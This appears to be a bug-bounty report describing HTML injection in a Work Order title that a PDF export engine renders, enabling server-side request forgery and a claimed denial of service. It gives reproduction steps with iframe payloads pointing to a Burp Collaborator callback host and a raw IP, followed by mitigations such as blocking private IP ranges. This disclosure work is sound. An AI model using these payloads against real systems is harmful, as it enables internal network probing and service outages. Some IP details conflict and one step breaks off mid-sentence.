Pdf Ssrf leads to Dos
Description:The Domain.com application is affected by a serious HTML Injection vulnerability in the Work Order title field. This issue becomes exploitable when the system generates a PDF, as the backend PDF engine processes the injected HTML and attempts to load any external resources referenced inside it. Since these requests are made by the server itself, the behavior can be abused to perform Server-Side Request Forgery (SSRF).
By inserting specially crafted HTML, an attacker can force the Domain.com server to request internal or external URLs. This enables probing of internal network services that are not accessible from the internet, as well as triggering callbacks to attacker-controlled domains to confirm successful SSRF. During testing, attempting to load the IP address 34.96.46.197 caused the PDF generator to hang, resulting in a complete Denial of Service (DoS) where the PDF export feature stopped working for all users.
This vulnerability combines HTML Injection, SSRF, and potential DoS impact, giving attackers the ability to interact with internal systems, verify exploitation externally, and disrupt core application functionality—making it a high-risk security issue
Step 1:
Login as an Admin/User and navigate to Work Orders.
Step 2:
Edit the Work Order title and inject the following payload:
“><iframe src=“https://el3vnedo5e88fil07h3zrk6w6nce32s.burpcollaborator.net”>
Step 3:
Click Export to PDF.
Step 4:
Observe the server-side behavior: there is the burp collaborator client content and in my
server i got access of the internal ip
IMP: also if we try to load this ip 11.11.111.111 using same method its perform the dos in the system and then no
Step 5:
I loaded the target IP inside an iframe using the following payload:
"><iframe src=11.11.111.111>
As soon as this payload was processed during PDF export, the server attempted to load the IP address. This caused the PDF export feature—and eventually the entire website—to become unresponsive, resulting in a complete Denial of Service (DoS). The iframe forced the backend to repeatedly request the server IP, which overloaded the system and brought the site down.
Impact
- Server-Side Request Forgery SSRF
Potential access to internal network services and cloud instance metadata.
- Information Disclosure
Reveals internal IP addresses, cloud metadata, and network topology.
- Chained Exploitation
Could lead to Remote Code Execution (RCE) if internal services are insecure.
Mitigation & Recommendations
- Sanitize and Escape HTML Inputs in fields that are exported to PDF.
- Use a Secure PDF Rendering Library that blocks or restricts external resource fetching.
- Implement SSRF Protection
Block requests to private/internal IP ranges:
127.0.0.0/8, 169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16
- Disable External Resource Loading in PDF generation.
- Monitor and Log All Outgoing Requests from PDF generation servers.
